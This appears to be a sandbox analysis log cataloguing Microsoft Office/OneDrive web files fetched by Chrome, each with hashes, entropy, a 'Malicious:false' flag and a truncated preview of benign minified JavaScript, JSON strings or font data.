                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[7],{4479:function(e,t,n){n.d(t,{a:function(){return I}});var a=n("react-lib"),i=n(115),r=n(114),o=n(2588),s=n(2586),c=n(2551);const d=(0,c.a)("ErrorCircle12Filled","12",["M6 11A5 5 0 1 0 6 1a5 5 0 0 0 0 10Zm-.75-2.75a.75.75 0 1 1 1.5 0 .75.75 0 0 1-1.5 0Zm.26-4.84a.5.5 0 0 1 .98 0l.01.09v2.59a.5.5 0 0 1-1 0V3.41Z"]),l=(0,c.a)("Warning12Filled","12",["M5.21 1.46a.9.9 0 0 1 1.58 0l4.09 7.17a.92.92 0 0 1-.79 1.37H1.91a.92.92 0 0 1-.79-1.37l4.1-7.17ZM5.5 4.5v1a.5.5 0 0 0 1 0v-1a.5.5 0 0 0-1 0ZM6 6.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"]),u=(0,c.a)("CheckmarkCircle12Filled","12",["M1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6Zm7.35-.9a.5.5 0 1 0-.7-.7L5.5 6.54 4.35 5.4a.5.5 0 1 0-.7.7l1.5 1.5c.2.2.5.2.7 0l2.5-2.5Z"]);var f=n(1889),p=n(200),m=n("fui.core_932"),_=n(145);const h={error:a.createElement(d,null),warning:a.createElement(l,null),success:a.createElement(u,null),none:void 0},b=(0,m.lj6)({base:{mc9l5x:"f13qh94s"},hor
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4671)
                                                          Category:downloaded
                                                          Size (bytes):10888
                                                          Entropy (8bit):5.352446685083588
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1A3BB32C63B0612D40DBE0BBBC3D27BE
                                                          SHA1:B11CF3868EF4EFF0F6B0718B5CD6A4D1C2A0E320
                                                          SHA-256:63C8741BD5DF51C96EB99EEDDB4BA1BF6F81DC10BCD62D48B46609E909BCB617
                                                          SHA-512:BE14F261A3AE5B3AE64DBF5AE96B2D169D32D9744F2B4EF35C0C51EB080DB864E47F73DA23DEC64417DB9FC729781E215A85249F6250C01BB8ADE7ABCC43FA51
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/282.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[282],{4389:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return o}});var a=n(0),i=n(165),r=new a.a("followed"),o=new i.a("followedItem")}.,4996:function(e,t,n){n.d(t,{a:function(){return r}});var a=n(5),i=n(2081);function r(e,t){var n,r=t.itemKey,o=t.isMountPoint,s=e.demandItemFacet(a.r,r);if(e.demandItemFacet(a.v,null==s?void 0:s.itemKey))return!0;var c=null===(n=e.demandItemFacet(a.o,r))||void 0===n?void 0:n.extension;return(0,i.b)({extension:c,isList:!1,isMountPoint:o})}}.,2235:function(e,t,n){n.r(t),n.d(t,{spFavoritesAddon:function(){return x}});var a=n(19),i=n(66),r=n(5),o=n(31),s=n(74),c=n(6241),d=n(892),l=n("tslib_538"),u=n(46),f=n(889),p=n(4389),m=n(22),_=n(4996),h=n("odsp.util_517"),b=n(6),g=n(7),v=n(34),y=n(1636),S=!h.x9.isActivated("F01DE29D-B569-499E-83F8-AF66263E0852","03/24/2023","Do not show favorite command until data resolves");function D(e,t){var n=t.itemKeys,a=y.a.serialize({})
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (9715)
                                                          Category:dropped
                                                          Size (bytes):531444
                                                          Entropy (8bit):5.032730725038875
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3E2FB049431479F9EAB130D79E21E04D
                                                          SHA1:1EBEDAF88ED99B6C0E06AC901A5AAD41CE017E4B
                                                          SHA-256:A8C889BECC0BD0E630644442899623417A036E315603117B810385B0FA14229B
                                                          SHA-512:779DB69ADC275AACE8BA5D4A3B72FA425122D3E62A2A2253C953BE6C7F92B641E15B3C7191C18B0C1536C93846965C6F4668E6A5C9938719456EBE16D8F16F2F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx","deferred.resx"],{9077:function(e){e.exports=JSON.parse('{"needsPasswordLabel":"{0} requires a password.","enterPassword":"Enter password","enterPasswordDialogLabel":"Enter password to open this PDF file","invalidPasswordPrompt":"Incorrect password. Please try again.","dialogOk":"OK","dialogCancel":"Cancel","zoomPageFitSize":"Window size","zoomPageFitWidth":"Window width","previousPageTooltip":"Previous page","nextPageTooltip":"Next page","zoomTooltip":"Zoom","zoomOutTooltip":"Zoom out","zoomInTooltip":"Zoom in","rotateTooltip":"Rotate","openInNewWindowTooltip":"Open in new window","searchTooltip":"Search","previousTooltip":"Previous result","nextTooltip":"Next result","upCommandAria":"Go to the previous page.","downCommandAria":"Go to the next page.","zoomCommandAria":"Change the current zoom level. Press enter to open the option menu and esc to close it.","zoomOutCommandAria":"Zoom out the d
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2397)
                                                          Category:downloaded
                                                          Size (bytes):5785
                                                          Entropy (8bit):5.419353040509713
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E349B4E9898E65EE9342AA300B1603A5
                                                          SHA1:09B728DCD66A52D4C24E90BB079ED61430943FE1
                                                          SHA-256:F048DEAD5783B858A7223D2392C2397A8D11AEA8086350BC353FFE2D50CC56DA
                                                          SHA-512:0BD4C13D0BD4972A51C48FAB33F5554A02DCF46101341B60FCF28E67DC52B692BD81EDDD1F862C976C0355BD58768508C6D25ABDA9675A49E1781C3EF15685D3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1340.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1340],{2828:function(e,t,n){n.d(t,{a:function(){return I},b:function(){return D},c:function(){return y},d:function(){return v},e:function(){return g},f:function(){return S}});var a=n("odsp.util_517"),i=n(381),r={ODB:61554};function o(){return a.ov.isFeatureEnabled(r)}var s={ODB:62043};function c(){return a.ov.isFeatureEnabled(s)}var d=!1;function l(e){var t,n=u("Error"),a=(0,i.a)();a.availability.customCopilotEAPCheckErrorType=e,null===(t=window.localStorage)||void 0===t||t.setItem(n,a.availability.customCopilotEAPCheckErrorType)}function u(e){return"UserInEAPGroup_".concat(e)}var f=n(85),p={ODB:61346},m={ODB:61866},_={ODB:61991},h={ODB:62020},b={ODB:62111};function g(e){var t,r,s=e.pageContextForEAPCheck,m=(0,i.a)();if(!a.x9.isActivated("87a98255-e313-4151-a344-a023c75eaadb","10/18/2024","isgulati - enable rcd check before enabling copilot")&&(null==s?void 0:s.IsRestrictedContentDiscoverabilityEnabled))retur
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4205)
                                                          Category:downloaded
                                                          Size (bytes):6281
                                                          Entropy (8bit):5.194466142509313
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4AA0EC23B5619AE4EA22CB6CF0784301
                                                          SHA1:5A8F99A7B1E4F8CD06C62C3BA789389D852C5520
                                                          SHA-256:35DCB45A74021C597B05B2EB0344768AD93567DD0981745673718CE290882851
                                                          SHA-512:A9F66030DB48FAE8C36E137B41C0097593C3165574F104C9610FDB44B76341F139E522D54915D565CE66C83F22191C806D7CF5E705312944475C28D559F93F98
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/16.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16],{805:(e,t,n)=>{n.r(t),n.d(t,{clearCroupByFieldKey:()=>f});var a=n("tslib_538"),i=n("odsp.util_517"),r=n(66),o=n(16),s=n(1012),c=n(1194),d=n(110),l=n(2),u=n(216),f=new i.lh({name:"ClearGroupByField.Key",factory:{dependencies:{navigation:r.a,listViewStore:o.a,refreshCurrentListDataAsync:d.a.async.lazy,updateCurrentItemSetOptions:u.a},create:function(e){var t=e.navigation,n=e.listViewStore,i=e.refreshCurrentListDataAsync,r=e.updateCurrentItemSetOptions;return{instance:function(e){var o,d,u;return(0,a.yv)(this,void 0,void 0,function(){var f,p,m,_,h;return(0,a.SO)(this,function(b){switch(b.label){case 0:return(f=null===(o=null==n?void 0:n.getCurrentView())||void 0===o?void 0:o.getDomParts())&&f.groupBy&&(p=(0,c.c)(f.groupBy),(null===(d=p.group1)||void 0===d?void 0:d.fieldName)===e?void 0!==p.group2?n.updateGroupBy("clearCroupByFieldKey",{group1:(0,a.q5)({},p.group2)}):n.updateGroupBy("clearCroupByFieldKey",voi
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):17405
                                                          Entropy (8bit):4.927441203093628
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:27A0CDD0C814DB7635067A287E58A8AE
                                                          SHA1:3F705A0FD73F8789B976A25DBD4A461E5B6D6FF5
                                                          SHA-256:A4E6B1A9F1660AF5DD48C1A8D1F4F1C8BF1A7579ED090BFBCA831E989C36CBBE
                                                          SHA-512:B563CFCB02C909AF6624C9DB3ECA4E0F0E9525F8A6A909E1449B77ABB6E833F556AF3749085C6595E2254B6E246969F731823E405EBA042C6B147903360C2B35
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://shell.cdn.office.net/shellux/en/shellstrings.27a0cdd0c814db7635067a287e58a8ae.json
                                                          Preview:{. "Microsoft": "Microsoft",. "FlexpaneCloseButton": "Close pane",. "Me_Header": "My account",. "MePhotoAriaLabel": "{0} {1} Current account's user photo",. "ChangePhotoAriaLabel": "{0} {1} Change the photo that appears in IM. This may open a new window.",. "MePhotoTitle": "Current account's user photo",. "ChangePhotoTitle": "Change the photo that appears in IM. This may open a new window.",. "AppLauncherAriaLabel": "App launcher opened",. "AppLauncherCloseAriaLabel": "Close the app launcher",. "AppLauncherHomeAriaLabel": "Microsoft 365, will be open in new tab",. "AppsModuleHeading": "Apps",. "Microsoft365": "Microsoft 365",. "AppsModuleAllApps": "All apps",. "AppsModuleAllAppsTooltip": "Open all apps",. "AllViewGroupShowMore": "Show More",. "AllViewGroupShowLess": "Show Less",. "AllViewBack": "Back",. "AllViewNewGroupHeading": "New",. "AllViewAdminSelectedGroupHeading": "Admin selected apps",. "AllViewMoreFirstPartyGroupHeading": "More from Microsoft",. "AllViewT
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (14090)
                                                          Category:dropped
                                                          Size (bytes):14189
                                                          Entropy (8bit):5.182701283287261
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:EBB0C42BDD347E55010EE39649796EE0
                                                          SHA1:900C55451FEEE473855F2A0187E423393C2F0470
                                                          SHA-256:0957DC43B97814F5C30F5CF4FC804F9CBAC0F1B9403320E6831F9BBA56B2E179
                                                          SHA-512:5285FA5DC7B3DA704552E526628FD243357C0D96F800EC7459C5E1064480507102EB10647B69C674AB780BDAFB6E814FC0A3EF47D70004399CCCA07B510719E9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[33],{2763:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_538"),i=n("react-lib"),r=n("fui.util_175"),o=n(133),s=n(284),c=n(49),d=n(978),l=n(2764),u=n(152),f=function(e){if(void 0===e)return 0;var t=0;return"scrollTop"in e?t=e.scrollTop:"scrollY"in e&&(t=e.scrollY),Math.ceil(t)},p=function(e,t){"scrollTop"in e?e.scrollTop=t:"scrollY"in e&&e.scrollTo(e.scrollX,t)},m=n(151),_=n(285),h={top:-1,bottom:-1,left:-1,right:-1,width:0,height:0},b=function(e){return e.getBoundingClientRect()},g=b,v=b,y=function(e){function t(t){var n=e.call(this,t)||this;return n._root=i.createRef(),n._surface=i.createRef(),n._pageRefs={},n._getDerivedStateFromProps=function(e,t){return e.items!==n.props.items||e.renderCount!==n.props.renderCount||e.startIndex!==n.props.startIndex||e.version!==n.props.version||!t.hasMounted&&n.props.renderEarly&&(0,r.PX)()?(n._resetRequiredWindows(),n._requiredRect=null,n._measureVersion++
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (36614)
                                                          Category:downloaded
                                                          Size (bytes):58977
                                                          Entropy (8bit):5.418280955593207
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:84FA89F4586B5CE01D9807A7AEC363CD
                                                          SHA1:1F2A2BFB51263FDD36BB9CA97FFE5F0D635CCEE8
                                                          SHA-256:91888136AADC58A4C0F96F10FBC38207D2481C010181B653FBD22C1A20E388E3
                                                          SHA-512:264249F1F6DB0C278B9B0061A4C7B1B3DAD7C86E4034FCEAC35650BBA4C1809E4B43EEE59253B6D33F67841D77832A14A3B2747D475C05E50EBD179D80C62F83
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/148.js
                                                          Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[148],{2772:function(e,t,n){"use strict";n.d(t,{a:function(){return o},b:function(){return I},c:function(){return O},d:function(){return p},e:function(){return s}});var a,i=n(2583),r=function(){function e(e){i.m.isNotNullOrUndefined(e,"id"),this._id=e}return e.create=function(t){return new e(t)},Object.defineProperty(e.prototype,"id",{get:function(){return this._id},enumerable:!1,configurable:!0}),e.prototype.isEmpty=function(){return 0===this._id.length},e}(),o=r,s=i.i.createCustom("sp-client-base:LogSource",function(e){return r.create("")}),c=function(){function e(e){if(this._head=-1,this._count=0,this._isIterating=!1,e<=0)throw new Error("Size must be positive");this._size=e,this._buffer=new Array(e)}return Object.defineProperty(e.prototype,"count",{get:function(){return this._count},enumerable:!1,configurable:!0}),e.prototype.push=function(e){this._ensureNotIterating(),this._head++,this._count++,this._head===this._size
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5176)
                                                          Category:downloaded
                                                          Size (bytes):9990
                                                          Entropy (8bit):5.208093187267943
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:97CA45CB298EFDD69C0B46F9E97448C8
                                                          SHA1:DD6FD5B5307E1C122FBD6B664B193F363369863F
                                                          SHA-256:889F88D1D16C85A3BB755B59207197F6F92EEECEC5D4C5ABD60E756014BCC53E
                                                          SHA-512:F9C3580F201A36B9AB4CDFBEAFC2A808306C8C4C30A8E71C592026EE26BC0A67F9A1BAE91CA935D35462E63EC654CE59889E4358507744B3416205D6B9794C8F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/9206.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[9206],{731252:(e,t,n)=>{n.d(t,{Y:()=>m});var a=n(171125),i=n(539155),r=n(333055),o=n(961561),s=n(235614),c=n(74889),d=n(702625),l=n(441525),u=n(145381),f=n(312573),p=(0,d.U9)(function(e,t,n){var i=(0,l.$)(e),r=(0,u.$)(e),o={root:{minWidth:"80px",height:"32px"},label:{fontWeight:c.wO.semibold}};return(0,c.KW)(i,o,n?function(e){var t,n,i,r,o,s,d,l,u,p=e.palette,m=e.semanticColors;return{root:{backgroundColor:m.primaryButtonBackground,border:"1px solid ".concat(m.primaryButtonBackground),color:m.primaryButtonText,selectors:(t={},t[c.yp]=(0,a.__assign)({color:"Window",backgroundColor:"WindowText",borderColor:"WindowText"},(0,c.Vg)()),t[".".concat(f.J2," &:focus")]={selectors:{":after":{border:"none",outlineColor:p.white}}},t)},rootHovered:{backgroundColor:m.primaryButtonBackgroundHovered,border:"1px solid ".concat(m.primaryButtonBackgroundHovered),color:m.primaryButtonTextHovered,selectors:(n={}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4551), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):4551
                                                          Entropy (8bit):5.389564111731932
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D845C7CFDF504D17DD1A01BC3F58D0E9
                                                          SHA1:4BF62628612111A63DED2B04639BCF918D0C4EB9
                                                          SHA-256:8FFBAC41E6195332D893B04AA93F305DDA63CC5317EE6D89E4D177CCCDE72240
                                                          SHA-512:3398BB9E265849D4A0B67047D9AC47DDA235DF7261BC95B9B8D0B4F7575C7E06C312592CE76C8CDA1C7109866B0F2A128D3161C99785C3EC872956BD432B75D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://r4.res.office365.com/footprint/v3.2/scripts/fp-min.js
                                                          Preview:Footprint=function(){var t=1,n=2,e=t|n,r=8,o=16,i=r|o,u=e|i,a=128,f=256,s=e|(a|f),c="http://",l=200,m="trans.gif",p="/apc/",g=5e3,d="trans.gif",h="100k.gif",v=822.128,w=1e3,T="GET",y="POST",M=-1,I="20190214",b="x-userhostaddress",D="x-endpoint",R="x-frontend";function q(t,n,e,r){if(!(n>=t.length)){e!==T&&e!==y&&(e=T);var o=function(){q(t,n+1,e,r)},i=new XMLHttpRequest;i.open(e,t[n],!0),i.onload=function(){4===i.readyState&&200===i.status?null!=r&&r(i):o()},i.onerror=o,i.timeout=g,i.ontimeout=o,i.send()}}function O(t,n){if(t<=0)return t;if(n&i&&t>0){var e=v/(t/w);return Math.round(e)}return Math.round(t)}function x(){function t(){return Math.floor(65536*(1+Math.random())).toString(16).substring(1)}return t()+t()+t()+t()+t()+t()+t()+t()}function H(){return!(!window.performance||!window.performance.getEntriesByName)}return{start:function(e,v,w,y,L){try{if(void 0===y&&(y=""),void 0===L&&(L=""),!e||0===e.trim().length||Number(w)!==w||w%1!=0||w<0)return;var S=L.trim().length>0,A=y.trim().len
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7329)
                                                          Category:dropped
                                                          Size (bytes):8583
                                                          Entropy (8bit):5.286358128727933
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:403B2BE7FE20ACEAE77F0269769F2155
                                                          SHA1:D3E651DB007A5B89B08070250BA275FA3AE21BCF
                                                          SHA-256:43E4D9D77B3B5B8F8B0B5E4C617673446B71760876C5FC70E71521C6C0225E9A
                                                          SHA-512:C36BD1A2649E798DAEE316B756979D7F001049338EBAF3E5B6B66C8568A1A210D1AD7087734D588280FB3C2B2D3F44C7E94D8BC4AD9A40A5BF4B538A59008C27
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[178],{3710:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a},c:function(){return r},d:function(){return o}});var a="ListsAction",i="SPListAction",r="resetAllSurveyStatuses",o="resetSurveyStatusById"}.,5001:function(e,t,n){n.d(t,{a:function(){return y}});var a=n("tslib_538"),i=n(10),r=n(402),o=n(156),s=n(121),c=n(17),d=n(79),l=n("odsp.util_517"),u=n(109),f=n(411),p=n(1418),m=n(1419),_=n(1334),h=l.x9.isActivated("60B05ED0-5912-442F-97BA-70A6BCAF2ADD"),b=l.x9.isActivated("5252DF6C-E868-444D-9381-8A37A145DBA8"),g=l.x9.isActivated("7B6FC2DB-D98E-4399-8BBA-E13E98CA50C4"),v="Not implemented",y=function(){function e(e,t){var n=this;this._campaignDefinitions=[],this._shouldInitFloodgate=function(){return(0,a.yv)(n,void 0,void 0,function(){var e;return(0,a.SO)(this,function(t){switch(t.label){case 0:return h?[2,!0]:(e=this,[4,this._getFloodgateProperties()]);case 1:return e._floodgateProperties=t.sen
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (3565)
                                                          Category:downloaded
                                                          Size (bytes):12464
                                                          Entropy (8bit):5.367851248429025
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B12A03582E9221C1C52C83C9AA7A19A5
                                                          SHA1:2D7EF46863E2A28F4CE21A5A40B93CA139C1E908
                                                          SHA-256:5DC7415A54AB3232A92A61B0C9CB74F979A462808299108CA42E386DD03BF9B2
                                                          SHA-512:CA44F502F98F8D95720D2180C3FD6F12BF94F70D06D64C8208F45A627619435D807103E8C6174E2CD7C856213EFC9F4DDBBDA74593937B062CA66ACC24F10883
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/2.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2],{8655:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("react-lib"),i=n("fui.core_932"),r=n(145),o=n(115),s=n(114);const c=(0,i.sXw)("rhfpeu0",null,{r:[".rhfpeu0{gap:8px;height:fit-content;box-sizing:border-box;display:flex;grid-row-start:3;grid-row-end:3;}"],s:["@media screen and (max-width: 480px){.rhfpeu0{flex-direction:column;justify-self:stretch;}}"]}),d=(0,i.lj6)({gridPositionEnd:{Bdqf98w:"f1a7i8kp",Br312pm:"fd46tj4",Bw0ie65:"fsyjsko",B6n781s:"f1f41i0t",Bv5d0be:"f1jaqex3",v4ugfu:"f2ao6jk"},gridPositionStart:{Bdqf98w:"fsxvdwy",Br312pm:"fwpfdsa",Bw0ie65:"f1e2fz10",Bojbm9c:"f11ihkml",Bv5d0be:"fce5bvx",v4ugfu:"f2ao6jk"},fluidStart:{Bw0ie65:"fsyjsko"},fluidEnd:{Br312pm:"fwpfdsa"}},{d:[".f1a7i8kp{justify-self:end;}",".fd46tj4{grid-column-start:2;}",".fsyjsko{grid-column-end:4;}",".fsxvdwy{justify-self:start;}",".fwpfdsa{grid-column-start:1;}",".f1e2fz10{grid-column-end:2;}"],m:[["@media screen and (
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5159)
                                                          Category:downloaded
                                                          Size (bytes):11655
                                                          Entropy (8bit):5.333497123106215
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5095F660CA3AF8738717536F99F98499
                                                          SHA1:BCE5579A9EB4FF9D655FBF1DC9C0C8732B66E888
                                                          SHA-256:184670842A6DA4A9A0023391B99FDEBCBF502E42316EC3B57CA664E32E1EEA0D
                                                          SHA-512:62FBF8C50EE630A1BFB16DFD57EB79B620218DFEF14142839AC3AF6A89E72BC854F1A4F512E006DDC3D5EC0DB7130385A195D6C02B74E66E372C6472F1C53273
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/28941.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[28941],{636003:(e,t,n)=>{function a(e){r!==e&&(r=e)}function i(){return void 0===r&&(r="undefined"!=typeof document&&!!document.documentElement&&"rtl"===document.documentElement.getAttribute("dir")),r}var r;function o(){return{rtl:i()}}n.d(t,{AU:()=>a,Ty:()=>o}),r=i()}.,535661:(e,t,n)=>{n.d(t,{n:()=>s});var a,i=n(171125),r="undefined"!=typeof navigator&&/rv:11.0/.test(navigator.userAgent),o={};try{o=window||{}}catch(e){}var s=function(){function e(e,t){var n,a,r,o,s,c;this._rules=[],this._preservedRules=[],this._counter=0,this._keyToClassName={},this._onInsertRuleCallbacks=[],this._onResetCallbacks=[],this._classNameToArgs={},this._config=(0,i.__assign)({injectionMode:"undefined"==typeof document?0:1,defaultPrefix:"css",namespace:void 0,cspSettings:void 0},e),this._classNameToArgs=null!==(n=null==t?void 0:t.classNameToArgs)&&void 0!==n?n:this._classNameToArgs,this._counter=null!==(a=null==t?
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 17844, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):17844
                                                          Entropy (8bit):7.9804127898648085
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:30062C841E349D94FA6488120D38961C
                                                          SHA1:15BC10A89CCAE5A2801DB026F0F2C440FC945938
                                                          SHA-256:AF091CE21910C117EF71BABA6B6046D7B056B3A03D7FA5346008948F7B607EE9
                                                          SHA-512:F5E1ED49A07F1FDA4C9B9705CA41D44BDF5AA8347B447231FAED2231E0E6725F73E327DD896A7C0051D8037AA26D8F7426C26A2710A8F15EB16A4F347E0DD2AD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-8-5756996f.woff
                                                          Preview:wOFF......E.......{.........................OS/2.......G...`2.u.cmap...P............gasp................glyf......={..k.....head..@p...3...6#.hhea..@........$....hmtx..@....W.......iloca..A.........9..maxp..A........ .r.'name..A........O..R.post..E........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px%......`u,......7..?.x...OH.Q...*E+...J..B..<.....^.n....`....XDD.u.....F...^...."..x.Et..+A...?E<x.3..7.;|..c....mlZMJX'.5.SZ..L....1W,!.R!..<.J.K.4JP^KH.dN.eE6eK qIHR..?...p...7..[..;../JP..x..../.vt..]...F..;D0.......'L...1.Y../.a).....[pp`...g.{a.:.7x...v-_*."..c_.*....)....9=Ye<.C..a.Q...5\.U..b..B.p>?..>.....{.b/g...p..0.G.FQ...L.@q.A..."M.W....X.~...>...E...(@.TG...3r.O/_;...............................x....`..(\.==..zNM.f4g.hF.....-[.|.|.......4..alC..0g0I...B.....6w.6$y..H^...$....L.UUw.H.I..w..tWWW...W_}g.P.....3...4.@..2>.:^........'..g'...B..-P.......S.0.M%;.L:N..<z.R...rC.:.7Q6..J%...D.2.l....T(.I..._....ilV{j<<.....z2.a..W.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5390)
                                                          Category:downloaded
                                                          Size (bytes):5395
                                                          Entropy (8bit):4.366315908112406
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:102A1E9BC6F1329CB1984CAABFB924D6
                                                          SHA1:574986DB1C4C94E578075F2D3C3BAAFA52C6D93C
                                                          SHA-256:30FCBB2B4237782E3A90E7CA96185CD45A031FC479841CD5B664E9E030DF9ED8
                                                          SHA-512:9B371F64F1F277FC1AE7B32F451F2BBD6334556D04D35DDC49C79FB0D0275327B41E3D5753E6DD6D5778EF7C825B3ECB4CFF4B5BDBDFB80587428FBFD720D44C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/91657.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[91657],{391657:(e,t,n)=>{n.d(t,{By3:()=>l,CqF:()=>i,Ebs:()=>m,F53:()=>p,GqZ:()=>r,SqM:()=>u,WL4:()=>d,_4c:()=>s,b3T:()=>f,kF8:()=>c,kKn:()=>o});var a=n(639691);const i=(0,a.U)("TextAlignLeft16Regular","16",["M1 3.5c0-.28.22-.5.5-.5h9a.5.5 0 0 1 0 1h-9a.5.5 0 0 1-.5-.5Zm0 4c0-.28.22-.5.5-.5h13a.5.5 0 0 1 0 1h-13a.5.5 0 0 1-.5-.5Zm0 4c0-.28.22-.5.5-.5h5a.5.5 0 0 1 0 1h-5a.5.5 0 0 1-.5-.5Z"]),r=(0,a.U)("TextAlignLeft20Filled","20",["M2 4.25c0-.41.34-.75.75-.75h10.5a.75.75 0 0 1 0 1.5H2.75A.75.75 0 0 1 2 4.25Zm0 5c0-.41.34-.75.75-.75h14.5a.75.75 0 0 1 0 1.5H2.75A.75.75 0 0 1 2 9.25Zm.75 4.25a.75.75 0 0 0 0 1.5h8.5a.75.75 0 0 0 0-1.5h-8.5Z"]),o=(0,a.U)("TextAlignRight20Filled","20",["M6 4.25c0-.41.34-.75.75-.75h10.5a.75.75 0 0 1 0 1.5H6.75A.75.75 0 0 1 6 4.25Zm-4 5c0-.41.34-.75.75-.75h14.5a.75.75 0 0 1 0 1.5H2.75A.75.75 0 0 1 2 9.25Zm7.75 4.25a.75.75 0 0 0 0 1.5h7.5a.75.75 0 0 0 0-1.5h-7.5Z"]),s=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (3857)
                                                          Category:downloaded
                                                          Size (bytes):4304
                                                          Entropy (8bit):5.238751957549422
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8AAC8E7A4E9D1113949D3AA2D56A4581
                                                          SHA1:0D3088CFC068933CF30E4E530B227B2A8C6B6720
                                                          SHA-256:409A5DD097F997250E0447B14459A5F7CA66EC8FC8FC0C634047D55C3ED67D07
                                                          SHA-512:6BEBE0462B1A92BAC2C07B9C2987B8CEFC3E2EE5F7C21AFD4E1790CB4AB146255C3F6C4F3E273AEDB48ADC7BD21E407B667BC2653E46B4CA05C19CD88DE1F99D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/onePlayer.js
